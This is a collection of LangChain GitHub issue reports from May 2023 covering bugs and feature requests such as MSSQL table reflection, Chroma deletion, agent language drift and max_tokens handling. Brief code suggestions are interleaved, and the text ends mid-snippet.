2023-05-15T14:23:41Z
https://github.com/langchain-ai/langchain/issues/4571
1,707,431,483
4,571
[ "langchain-ai", "langchain" ]
### System Info Mac vs code python :Python 3.10.11 ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [X] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1. embedding some text into Chroma 2. query and run load_qa_chain with OpenAI ```python docs = docsearch.similarity_search(query="some txt",k=2) llm = OpenAI( streaming=True, callbacks=[StreamingStdOutCallbackHandler()], temperature=0.1) chain = load_qa_chain(llm=llm,chain_type="stuff",verbose=True) result = chain.run(input_documents=docs,question=query,return_only_outputs=True) ``` 3. The result in Chinese keeps 127 ~131 words, English will finish the whole sentence. example: ``` 我们***是一家专注于*****机构,近些年来,我们的学员人数突破****,遍布全国***个城市,海外**个国家,这自然是我们家长对于****最好的认可。我们深知宝贝一开始有兴趣,后来因为各种的枯燥变得不愿意学了,因此,我们采用三方合作配合的模式,即家长 ``` ``` 我们***是一家专注于*****机构,近些年来,我们的学员人数突破****,遍布全国***个城市,海外**个国家,这自然是我们家长对于***最好的认可。我们深知宝贝一开始有兴趣,后来因为各种的枯燥变得不愿意学了的顾虑,因此我们采用了一种科学的学习模式 ``` ### Expected behavior I think this was posted while working on characters, looking forward to a fix.
When using embedding, the Chinese reply will be incomplete
https://api.github.com/repos/langchain-ai/langchain/issues/4569/comments
4
2023-05-12T11:02:03Z
2023-05-24T07:43:59Z
https://github.com/langchain-ai/langchain/issues/4569
1,707,420,231
4,569
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. ### Describe the bug When using the db.get_usable_table_names() function with a MS SQL database, it doesn't return any table names. However, when using the same function with SQLite3, it works as expected. Interestingly, the db.run() method works correctly, returning expected records for direct SQL queries like 'select * from Shops'. ### To Reproduce `db = SQLDatabase.from_uri("mssql+pymssql://user:pass@xxx.xxx.xxx.xxx:port/KK_ANA")` - Call db.get_table_names(). The return value is an empty set. [return "set()"] - Run a direct SQL query using db.run('select * from Shops'). It correctly returns the expected records. Run the SQLDatabaseSequentialChain: `llm = ChatOpenAI(temperature=0) db_chain = SQLDatabaseSequentialChain.from_llm(llm, db, verbose=True) db_chain.run('show me list of tables')` ### Output ![return1](https://github.com/hwchase17/langchain/assets/57922467/ac4ad37b-2d94-4e03-9784-4ce7a1d014ab) ### Environment - Langchain version: 0.0.165 - Python version: 3.10 - SQLAlchemy Version: 2.0.12 (problem also occurs with version 1.4.x) - pymssql Version: 2.2.7 ### Suggestion: _No response_
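`get_usable_table_names` relies on SQLAlchemy reflection, which on MSSQL inspects only the connection's default schema; passing `schema="dbo"` (or whichever schema holds the tables) to `SQLDatabase.from_uri` may help, depending on the installed version. The underlying table-name reflection can be illustrated with stdlib sqlite3:

```python
import sqlite3

def usable_table_names(conn):
    # Equivalent of what reflection does on SQLite: read names from sqlite_master.
    rows = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'"
    ).fetchall()
    return {row[0] for row in rows}

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE Shops (id INTEGER, name TEXT)")
print(usable_table_names(conn))  # → {'Shops'}
```

On MSSQL the analogous check is querying `INFORMATION_SCHEMA.TABLES` directly, which helps confirm whether the tables live in a non-default schema.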
Issue: db.get_usable_table_names() return nothing
https://api.github.com/repos/langchain-ai/langchain/issues/4565/comments
5
2023-05-12T09:28:35Z
2024-03-11T13:35:37Z
https://github.com/langchain-ai/langchain/issues/4565
1,707,286,145
4,565
[ "langchain-ai", "langchain" ]
### System Info langchain = "^0.0.154" Platform - macos Python Version - python 3.10.4 ### Who can help? @eyurtsev There is no directory called .credentials in my home directory thats why getting this error. Is this intional? why not create this directory before opening token_path to write the token json. Code reference = https://github.com/hwchase17/langchain/blob/master/langchain/document_loaders/youtube.py#L94 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [X] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Was trying to use official Youtube loader by following [this](https://python.langchain.com/en/latest/modules/indexes/document_loaders/examples/youtube_transcript.html#youtube-loader-from-google-cloud) tutorial. ### Expected behavior It should not throw this error
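The straightforward fix is to create the parent directory before opening the token file for writing. A sketch of that guard, demonstrated in a temp directory (function name is illustrative):

```python
import os
import tempfile

def write_token(token_path: str, payload: str) -> None:
    # Create ~/.credentials (or any missing parent) before opening the file.
    os.makedirs(os.path.dirname(token_path), exist_ok=True)
    with open(token_path, "w") as f:
        f.write(payload)

base = tempfile.mkdtemp()
token_file = os.path.join(base, ".credentials", "token.json")
write_token(token_file, "{}")
print(os.path.exists(token_file))  # → True
```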
FileNotFoundError: [Errno 2] No such file or directory: '$HOME/.credentials/token.json'
https://api.github.com/repos/langchain-ai/langchain/issues/4564/comments
1
2023-05-12T08:55:44Z
2023-09-10T16:18:46Z
https://github.com/langchain-ai/langchain/issues/4564
1,707,232,005
4,564
[ "langchain-ai", "langchain" ]
### System Info Hi i am using ConversationalRetrievalChain with agent and agent.run function is not returning source documents. Is this by functionality or is it a missing feature? ``` def llm_answer(query): chat_history = [] result = qa({"question": query, "chat_history": chat_history}) print('result is') print(result) print('-----------------------------') print(result['source_documents'][0]) print('-----------------------------') #populateHistory(query, result) return result qa = ConversationalRetrievalChain.from_llm(OpenAI(temperature=0), db.as_retriever(), return_source_documents=True) class requestModel(BaseModel): question: str app = FastAPI() tools = [ Tool.from_function( func=llm_answer, name = "Email knowledge base", description="useful for when you need to answer questions from emails in knowledge base", args_schema=requestModel ) #more tools ] agent = initialize_agent(tools, llm, agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION, verbose=True) # Define API endpoint for querying the model @app.post('/answer') async def answer(request: requestModel): print('request received') source_documents = [] # Get data from request print("Query is " + request.question) q_answer2 = agent.run(request.question) print("answer is ") print(q_answer2) #construct a json object to return answer and sources to the client reply = {'answer' : str(q_answer2), 'sources' : []} # for x in q_answer2["source_documents"]: # reply['sources'].append(x.metadata["source"]) return reply ``` ### Who can help? 
@hwchase17 ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction use code sample provided ### Expected behavior agent.run should provide both the answer and the source_documents
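One workaround while `agent.run` only returns the final answer string: capture `source_documents` in a side channel inside the tool function, then read it back after the agent finishes. A minimal sketch; the stub below stands in for the real `ConversationalRetrievalChain`, which would be called the same way:

```python
captured_sources = []

def make_tool_func(qa_chain):
    """Wrap the chain so every tool call stashes its source_documents."""
    def tool_func(query: str) -> str:
        result = qa_chain({"question": query, "chat_history": []})
        captured_sources.clear()
        captured_sources.extend(result.get("source_documents", []))
        return result["answer"]  # the agent only ever sees this string
    return tool_func

# Stub standing in for ConversationalRetrievalChain.from_llm(
#     OpenAI(temperature=0), db.as_retriever(), return_source_documents=True)
def fake_chain(inputs):
    return {"answer": "42", "source_documents": ["email_17.eml"]}

ask = make_tool_func(fake_chain)
answer = ask("How many employees are there?")
# after agent.run(...) finishes, captured_sources holds the documents
```

The endpoint can then populate `reply['sources']` from `captured_sources` instead of expecting them in the agent's return value.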
ConversationalRetrievalChain with Custom Agent is not returning source documents
https://api.github.com/repos/langchain-ai/langchain/issues/4562/comments
10
2023-05-12T08:18:15Z
2024-03-04T14:51:38Z
https://github.com/langchain-ai/langchain/issues/4562
1,707,179,648
4,562
[ "langchain-ai", "langchain" ]
### Feature request TLDR: Working on using `chat-conversational-react-description` agent and `RetrievalQA` as a tool to answer queries using a vector DB. Issue: If the question is asked in Japanese (the vector DB is in Japanese as well), the agent's initial `action_input` is completely nonsensical (the agent automatically translated it to English), which results in a wrong final answer. Request: (1) It would be helpful to somehow manipulate the `action_input` for agents to not rephrase the input queries when using a vector db, or to prompt support of agents with different languages. (2) It would be more helpful to have some way to see what knowledge the agent is using. Currently, I need to rely on only passing the user query to `RetrievalQA_chain` with `return_source_documents=True` to check. Code for reference: ```python retriever = RetrievalQA.from_chain_type( llm=LLM, chain_type="stuff", retriever=db_retriever, return_source_documents=False, ) retriever_tool_description = """Use this tool when you need to answer specific or game related questions. This tool can also be used for follow up questions from the user. """ tools = [ Tool( func=retriever.run, description=retriever_tool_description, name="Game Data DB" ), ] memory = ConversationBufferWindowMemory( memory_key="chat_history", input_key="input", output_key="output", k=3, return_messages=True, ) conversational_agent = initialize_agent( agent="chat-conversational-react-description", tools=tools, llm=LLM, verbose=True, max_iterations=2, early_stopping_method="generate", memory=memory, return_intermediate_steps=True, ) sys_msg = """Your role is to answer the game user's questions in a human-like manner""" prompt = conversational_agent.agent.create_prompt(system_message=sys_msg, tools=tools) conversational_agent.agent.llm_chain.prompt = prompt conversational_agent(input_query) ``` Output: The top JSON output is from calling the retriever directly on the user query. The latter part is the output when initializing the agent. 
<img width="1957" alt="image" src="https://github.com/hwchase17/langchain/assets/130352102/4c09e1c1-0493-4805-815b-b68871c6757e"> ### Motivation It's inconvenient to not be able to manipulate what the agent's initial action_inputs are. Plus, other languages can greatly benefit from such support. ### Your contribution I would like to hear from other people first and then make a PR.
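Until the rephrasing can be switched off, one pragmatic workaround is to keep the raw user input in a closure and have the tool ignore the agent's (possibly translated) `action_input`. A sketch with a stub retriever; names are illustrative:

```python
def make_verbatim_tool(retriever_run):
    """Return (set_query, tool_func); tool_func always retrieves with the
    last raw user query instead of the agent's rephrased action_input."""
    state = {"raw": ""}

    def set_query(q: str) -> None:
        state["raw"] = q

    def tool_func(action_input: str) -> str:
        # Deliberately ignore action_input: the agent may have translated it.
        return retriever_run(state["raw"])

    return set_query, tool_func

# Stub retriever that just echoes what it was actually asked.
set_query, tool = make_verbatim_tool(lambda q: "searched: " + q)
set_query("ゲームのルールは?")              # raw Japanese user query
result = tool("what are the game rules")   # agent's translated action_input
```

Before each `conversational_agent(input_query)` call you would invoke `set_query(input_query)`, so the vector DB is always queried in the original language.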
Using agents with custom tools completely changes the input if the question is asked in a different language
https://api.github.com/repos/langchain-ai/langchain/issues/4561/comments
12
2023-05-12T08:10:18Z
2023-10-31T01:54:50Z
https://github.com/langchain-ai/langchain/issues/4561
1,707,169,022
4,561
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I ask OpenAI questions through langchain, but langchain merges my question with my chat history into a new question and then sends that to OpenAI. The new question sometimes differs substantially from my original one. For example, I say to langchain: hello. langchain then asks OpenAI: How can I assist you today? So I sometimes get strange answers that seem unrelated to my original question. Why does langchain do this, and how can I fix it? ConversationalRetrievalChain(BaseConversationalRetrievalChain._call) ![image](https://github.com/hwchase17/langchain/assets/38252232/217a7169-5dc1-435b-b5da-fda9eaf0fa12) ### Suggestion: _No response_
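What is happening: `ConversationalRetrievalChain` first makes a separate LLM call that condenses the new input plus the chat history into a standalone question, and for inputs like "hello" that rewrite can drift badly. The default condense prompt has roughly this shape (a paraphrase; check `CONDENSE_QUESTION_PROMPT` in the library for the exact wording):

```python
# Rough paraphrase of the chain's condense-question prompt; the real
# template lives in langchain's conversational retrieval prompts module.
CONDENSE_TEMPLATE = (
    "Given the following conversation and a follow up question, rephrase "
    "the follow up question to be a standalone question.\n\n"
    "Chat History:\n{chat_history}\n"
    "Follow Up Input: {question}\n"
    "Standalone question:"
)

prompt = CONDENSE_TEMPLATE.format(chat_history="", question="hello")
```

Passing your own `condense_question_prompt` to `ConversationalRetrievalChain.from_llm` (for example, one instructing the model to keep the original language and to return the question unchanged when the history is empty) is the usual way to rein this in.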
My question gets changed by langchain (langchain changes my question)
https://api.github.com/repos/langchain-ai/langchain/issues/4555/comments
9
2023-05-12T06:01:15Z
2024-03-18T16:04:29Z
https://github.com/langchain-ai/langchain/issues/4555
1,706,981,762
4,555
[ "langchain-ai", "langchain" ]
### System Info I am using colab. ![image](https://github.com/hwchase17/langchain/assets/100080151/d1058dfb-f65d-41c6-be8f-806c9aef26d1) ### Who can help? @hwchase17 @vowelparrot ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [X] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ![image](https://github.com/hwchase17/langchain/assets/100080151/3292307a-04b8-4f92-8428-38b3e4655a35) ### Expected behavior ![image](https://github.com/hwchase17/langchain/assets/100080151/e3c42af8-9c72-48ab-8a63-d341225e4bf7)
Langchain python agent calculation is wrong!!!
https://api.github.com/repos/langchain-ai/langchain/issues/4551/comments
4
2023-05-12T04:59:05Z
2023-08-06T22:13:05Z
https://github.com/langchain-ai/langchain/issues/4551
1,706,926,023
4,551
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. When I use an agent with a gpt-3.5 LLM and a Google search tool, the AI's response is always in English, even though my input is in Chinese. Are there any ideas on how to ensure that the input and output languages are consistent? ### Suggestion: _No response_
Any ideas on making input and output languages consistent?
https://api.github.com/repos/langchain-ai/langchain/issues/4550/comments
12
2023-05-12T04:45:55Z
2024-01-19T08:29:11Z
https://github.com/langchain-ai/langchain/issues/4550
1,706,917,102
4,550
[ "langchain-ai", "langchain" ]
### Issue with current documentation: I have translated the documentation into Chinese and hope it is useful for Chinese developers. Langchain developers in China can now read it in Chinese. [www.langchain.com.cn](https://www.langchain.com.cn/) ### Idea or request for content: _No response_
I translated the documentation into Chinese; I hope it is useful for Chinese developers
https://api.github.com/repos/langchain-ai/langchain/issues/4548/comments
5
2023-05-12T03:41:53Z
2023-09-16T13:22:15Z
https://github.com/langchain-ai/langchain/issues/4548
1,706,868,540
4,548
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I wrote a PyQt5 GUI and use langchain to implement the chat function. But it seems I cannot package langchain with PyInstaller. ### Suggestion: _No response_
Issue: Can we use PyInstaller to package a program that uses langchain?
https://api.github.com/repos/langchain-ai/langchain/issues/4547/comments
30
2023-05-12T03:04:05Z
2024-03-18T16:04:25Z
https://github.com/langchain-ai/langchain/issues/4547
1,706,846,676
4,547
[ "langchain-ai", "langchain" ]
### Feature request Implement a new output parser that looks for the first of either `self.true_val` or `self.false_val` in the output. ### Motivation LLMs like to elaborate. Unfortunately, `BooleanOutputParser` requires an exact match. `SmartBooleanOutputParser` should provide a more flexible communication interface. ### Your contribution I'm implementing this
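A minimal sketch of the proposed behavior: return whichever of `true_val` / `false_val` appears first in the text instead of requiring an exact match (a standalone class here, not the eventual langchain implementation):

```python
class SmartBooleanOutputParser:
    """Find the first occurrence of true_val or false_val in the output."""

    def __init__(self, true_val: str = "YES", false_val: str = "NO"):
        self.true_val = true_val
        self.false_val = false_val

    def parse(self, text: str) -> bool:
        upper = text.upper()
        t = upper.find(self.true_val.upper())
        f = upper.find(self.false_val.upper())
        if t == -1 and f == -1:
            raise ValueError(
                f"Neither {self.true_val} nor {self.false_val} in output: {text!r}"
            )
        # whichever marker appears first wins
        return f == -1 or (t != -1 and t < f)
```

Note that naive substring search has caveats (e.g. "NO" appears inside "UNKNOWN"), so a word-boundary regex may be preferable in the real parser.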
SmartBooleanOutputParser
https://api.github.com/repos/langchain-ai/langchain/issues/4544/comments
1
2023-05-12T02:19:17Z
2023-09-10T16:18:52Z
https://github.com/langchain-ai/langchain/issues/4544
1,706,817,880
4,544
[ "langchain-ai", "langchain" ]
### System Info langchain:0.0.163 python:3.9 ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction "There is no item named 'word/footnotes.xml' in the archive" ### Expected behavior It should load the .docx file
UnstructuredWordDocumentLoader cannot load .docx file
https://api.github.com/repos/langchain-ai/langchain/issues/4543/comments
5
2023-05-12T01:58:17Z
2023-09-19T16:11:17Z
https://github.com/langchain-ai/langchain/issues/4543
1,706,804,209
4,543
[ "langchain-ai", "langchain" ]
### System Info The create_csv_agent function may have some bugs in the latest version of Langchain. I had a slightly older version on my local environment and the csv_agent was working with any csv. When I moved the function over to AWS Lambda, where I was working with the latest version of Langchain, I kept getting an exceeded prompt length error (same exact dataset). The function will work with a smaller data set, but something in the latest version of LC may be causing it to send too much to OpenAI. ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction import langchain from langchain.agents import create_csv_agent from langchain.llms import OpenAI import os import boto3 import tempfile file_name = 'XX' session = boto3.Session( aws_access_key_id='XX', aws_secret_access_key='XX' ) bucket_name = 'chatscreamingfrog' os.environ['OPENAI_API_KEY'] = 'XX' # Create an S3 resource object using the session s3 = session.client('s3') # Create a temporary file to download the CSV file from S3 with tempfile.NamedTemporaryFile() as temp_file: # Download the CSV file from S3 to the temporary file s3.download_file(bucket_name, file_name, temp_file.name) agent = create_csv_agent(OpenAI(temperature=0), temp_file.name,verbose = True) agent.run("show all Addresses with less than 10 Unique Inlinks") ### Expected behavior The agent executor should have returned my answer. However it is returning an exceeded prompt error.
create_csv_agent prompt errors in latest version
https://api.github.com/repos/langchain-ai/langchain/issues/4541/comments
2
2023-05-12T01:29:51Z
2023-09-10T16:18:57Z
https://github.com/langchain-ai/langchain/issues/4541
1,706,787,552
4,541
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I noticed that max_tokens can only be set on the OpenAI object. I'm using the following, where the openai object is initialized at startup: ``` llm_chain = LLMChain(prompt=prompt_template, llm=openai) results = llm_chain.apply(prompt_batch) ``` I pass 20 items per call, as specified in the OpenAI requests rate limitation. I would like to be able to estimate the max_tokens based on the prompt and the expected output and then pass it at the time of the request, to limit the cost of each request. I noticed that the max token count can be automatic, but only for a single prompt request. ### Suggestion: 1) make max_tokens a parameter in the apply() or generate() or predict() methods 2) modify the current behavior to not raise an exception when multiple prompts are provided and max_tokens = -1, and to calculate the maximum max token length based on the input. The first is preferred because it gives more flexibility; the expected response depends greatly on the prompt.
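Until such a parameter exists, the per-request cap can at least be estimated client-side before building the OpenAI object. A rough sketch; the 4-characters-per-token ratio is a crude heuristic for English text, so use tiktoken for exact counts:

```python
def estimate_max_tokens(prompts, context_window=4097, chars_per_token=4):
    """Leave room for the longest prompt in the batch and cap the completion.
    chars_per_token ~= 4 is a rough English-text heuristic, not a tokenizer."""
    longest = max((len(p) for p in prompts), default=0)
    prompt_tokens = longest // chars_per_token + 1
    return max(context_window - prompt_tokens, 1)

batch = ["Summarize: " + "x" * 400, "Translate: hi"]
cap = estimate_max_tokens(batch)
```

The feature request is essentially to let apply()/generate() accept the result of a helper like this per call, instead of fixing max_tokens once on the OpenAI object.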
Issue: max_tokens should be more flexible for OpenAI
https://api.github.com/repos/langchain-ai/langchain/issues/4540/comments
4
2023-05-12T01:05:42Z
2023-12-06T08:16:31Z
https://github.com/langchain-ai/langchain/issues/4540
1,706,770,187
4,540
[ "langchain-ai", "langchain" ]
### System Info langchain 0.0.166 Python 3.8.10 pygpt4all 1.1.0 ### Who can help? @Vowe ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [X] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction from langchain import PromptTemplate, LLMChain from langchain.llms import GPT4All from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler template = """Question: {question} Answer:""" prompt = PromptTemplate(template=template, input_variables=["question"]) callbacks = [StreamingStdOutCallbackHandler()] llm = GPT4All(model='ggml-gpt4all-j-v1.3-groovy.bin',backend='gptj',callbacks=callbacks,verbose=True) llm_chain = LLMChain(prompt=prompt,llm=llm) question = "What is Walmart?" print(llm_chain.run(question=question)) question = "Summarize the previous response so a child can understand it" print(llm_chain.run(question=question)) ### Expected behavior The above code snippet asks two questions of the gpt4all-j model. No memory is implemented in langchain. However, the response to the second question shows memory behavior when this is not expected. The response to the first question was " Walmart is a retail company that sells a variety of products, including clothing, electronics, and food. It is one of the largest retailers in the world, with over 2,000 stores in the United States alone. Walmart is a retail company that sells a variety of products, including clothing, electronics, and food. It is one of the largest retailers in the world, with over 2,000 stores in the United States alone." The response to the second question was "Walmart is a large retail store that sells a variety of things like clothes, electronics, and food. 
It is very big with many stores all over the United States. Walmart is a large retail store that sells a variety of things like clothes, electronics, and food. It is very big with many stores all over the United States."
gpt4all-j memory issue
https://api.github.com/repos/langchain-ai/langchain/issues/4536/comments
9
2023-05-11T20:57:02Z
2023-09-15T22:12:56Z
https://github.com/langchain-ai/langchain/issues/4536
1,706,545,458
4,536
[ "langchain-ai", "langchain" ]
### Feature request If unaware, Google has opened PaLM into public preview in Vertex AI in GCP. This uses different client libraries from the general-use PaLM API that was implemented in the base Langchain support for PaLM. ### Motivation As an enterprise user, I'd like to leverage the model endpoints that meet my organization's security and privacy requirements with LangChain. ### Your contribution I can open a PR, but as folks from Google like @brotchie having contributed, I wanted to make sure I wasn't duplicating work if I did this.
Vertex AI PaLM Support
https://api.github.com/repos/langchain-ai/langchain/issues/4532/comments
4
2023-05-11T19:43:07Z
2023-05-25T19:01:42Z
https://github.com/langchain-ai/langchain/issues/4532
1,706,438,031
4,532
[ "langchain-ai", "langchain" ]
### System Info ryzen 3600, 16gb ram, b450m ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction I have been having trouble with querying multiple agents. The first agent comes out okay, but for any others I attempt to query I get an axios error. I have functions for creating a chat model, creating a conversation chain, and creating an agent with tools and a memory using the two former functions. Here is my code ```js // Create OpenAI Chat instance const createChat = (model, temp) => { debug(`Creating chat ${model} temp ${temp}.`); return new ChatOpenAI({ temperature: temp, modelName: model }); }; // Create Chain (Memory) using LangChain const createChain = (model) => { // Define the chat prompt template with a MessagesPlaceholder to store the conversation history const chatPrompt = ChatPromptTemplate.fromPromptMessages([ SystemMessagePromptTemplate.fromTemplate( "The following is a friendly conversation between a human and an AI. The AI is talkative and provides lots of specific details from its context. If the AI does not know the answer to a question, it truthfully says it does not know." 
), new MessagesPlaceholder("history"), HumanMessagePromptTemplate.fromTemplate("{input}"), ]); // Create a ConversationChain with a BufferMemory to store the conversation history const chain = new ConversationChain({ memory: new BufferMemory({ returnMessages: true, memoryKey: "history" }), prompt: chatPrompt, llm: model, }); return chain }; // Create agent with tools and memory using LangChain const createAgent = async (model, memory) => { const embeddings = new OpenAIEmbeddings(); const tools = [ new WebBrowser({ model, embeddings }) ]; // Create agent with tools and memory const agent = await initializeAgentExecutorWithOptions(tools, model, { agentType: "chat-conversational-react-description" }, memory); return agent; } const easyAgent = async(llm, temp) => { const model = createChat(llm, temp); const chain = createChain(model); const agent = await createAgent(model, chain); return agent; } ``` The code works great! Until I try to make a new instance of an agent using the easyAgent() function. Input values are 'gpt-3.5-turbo' for model and 0.5 for temp. Here is the first agent I created with easyAgent(): https://pastebin.com/y6trG6t0 Here is the second agent I created with easyAgent(): https://pastebin.com/DhfNyV4z As you can see, both instances of the agent are exactly the same. There is no difference between the two. This is what leads me to believe the issue is with langchain. 
here is my error when i use the .call() method on the new agent: ``` Error: Request failed with status code 401 at createError (C:\Users\Admin\Desktop\Code\LLM-Chat\node_modules\openai\node_modules\axios\lib\core\createError.js:16:15) at settle (C:\Users\Admin\Desktop\Code\LLM-Chat\node_modules\openai\node_modules\axios\lib\core\settle.js:17:12) at IncomingMessage.handleStreamEnd (C:\Users\Admin\Desktop\Code\LLM-Chat\node_modules\openai\node_modules\axios\lib\adapters\http.js:322:11) at IncomingMessage.emit (node:events:549:35) at endReadableNT (node:internal/streams/readable:1359:12) at process.processTicksAndRejections (node:internal/process/task_queues:82:21) ``` All i can find relating to the issue is users running out of tokens or [this bug](https://github.com/openai/openai-node/issues/145) ### Expected behavior I am expecting to be able to query the second agent just as i am the first.
Openai chat query call error
https://api.github.com/repos/langchain-ai/langchain/issues/4530/comments
2
2023-05-11T18:45:58Z
2023-09-10T16:19:01Z
https://github.com/langchain-ai/langchain/issues/4530
1,706,357,431
4,530
[ "langchain-ai", "langchain" ]
### Feature request As a user of LangChain, I would like to request the integration of HuggingFace Agents ([announcement](https://twitter.com/huggingface/status/1656334778407297027) and [docs](https://huggingface.co/docs/transformers/transformers_agents)) into LangChain. HuggingFace Agents is an experimental API that allows users to control over 100,000 HuggingFace models by talking to Transformers and Diffusers. It is a fully multimodal agent that can handle text, images, video, audio, and documents. HuggingFace Agents is designed to be extensible by design, and its tools are elementary, making it easy to create new tools and push them to the Hub. I believe that the integration of HuggingFace Agents into LangChain will greatly benefit users and make LangChain an even more powerful framework for developing applications powered by language models. ### Motivation LangChain has already integrated with [Hugging Face Hub](https://python.langchain.com/en/latest/modules/models/llms/integrations/huggingface_hub.html) and [Hugging Face Local Pipelines](https://python.langchain.com/en/latest/modules/models/llms/integrations/huggingface_pipelines.html), making it an ideal platform to integrate with HuggingFace Agents. By integrating HuggingFace Agents into LangChain, users will have access to a more powerful language model that can handle more complex queries and offer a chat mode. For example, HuggingFace Agents allows LangChain to create images using text-to-image [diffusion models](https://huggingface.co/models?pipeline_tag=text-to-image&sort=downloads) such as Stable Diffusion by @Stability-AI or similar diffusion models. ### Your contribution I can contribute in different ways.
HuggingFace Agents
https://api.github.com/repos/langchain-ai/langchain/issues/4528/comments
1
2023-05-11T17:09:12Z
2023-09-22T16:09:19Z
https://github.com/langchain-ai/langchain/issues/4528
1,706,226,555
4,528
[ "langchain-ai", "langchain" ]
@agola11 + @hwchase17 + @dev2049 thanks for the review and pushing the PR over the finish line! I'd like to add a few more tests in a follow up - are you willing to add mlflow + azureml-mlflow packages as test dependencies or should we explore some other options? _Originally posted by @akshaya-a in https://github.com/hwchase17/langchain/issues/4150#issuecomment-1540983848_
Adding mlflow tests
https://api.github.com/repos/langchain-ai/langchain/issues/4527/comments
3
2023-05-11T16:32:34Z
2023-09-12T16:23:08Z
https://github.com/langchain-ai/langchain/issues/4527
1,706,167,855
4,527
[ "langchain-ai", "langchain" ]
### System Info I was able to somehow fetch the document chunk IDs from chroma db, but I could not figure out how to delete a specific document using its document name or document ID. I have gone through all the references but did not find a solution. Insertion and updating are supported, but not deletion. Can you please help with this? # Extract id of document chunks in vector database chroma_db.get()['ids'] Also, I have a question: when we pass embeddings to Chroma, why do we see embeddings = None when I run chroma_db.get()? I could only see document chunks and their IDs when I tried displaying the info inside, so why are we not seeing the embedding for each document chunk here? @hwchase17, it would be great if you can help on this, Thanks in advance. ### Who can help? @hwchase17 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction from langchain.document_loaders import DirectoryLoader from langchain.embeddings import OpenAIEmbeddings documents_pdf = DirectoryLoader(directory_path, glob="**/*.txt").load() openai_embeddings = OpenAIEmbeddings(model="text-embedding-ada-002") chroma_db = Chroma.from_documents(doc_chunks, embedding = openai_embeddings ) chroma_db.get() # all IDs in chroma db: list_of_chunk_ids = chroma_db.get()['ids'] print(len(list_of_chunk_ids)) ### Expected behavior 1. Solution on deletion 2. What all elements are stored in Chroma DB
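On the two questions: (1) deletion - the langchain wrapper does not expose a delete here, but the underlying chromadb collection does; `chroma_db._collection.delete(ids=[...])` is the usual escape hatch (note `_collection` is a private attribute, so this is an assumption about internals rather than a stable API). (2) `get()` shows `embeddings=None` because chromadb's `get` only includes documents and metadatas by default; the embeddings are stored, just not returned unless requested via its `include` argument. Selecting which chunk IDs to delete can be done from the `get()` payload. A pure-Python sketch over the dict shape shown above:

```python
def ids_for_source(get_payload: dict, source: str) -> list:
    """Pick the chunk IDs whose metadata 'source' matches a document name,
    given the {'ids': [...], 'metadatas': [...]} dict that get() returns."""
    return [
        chunk_id
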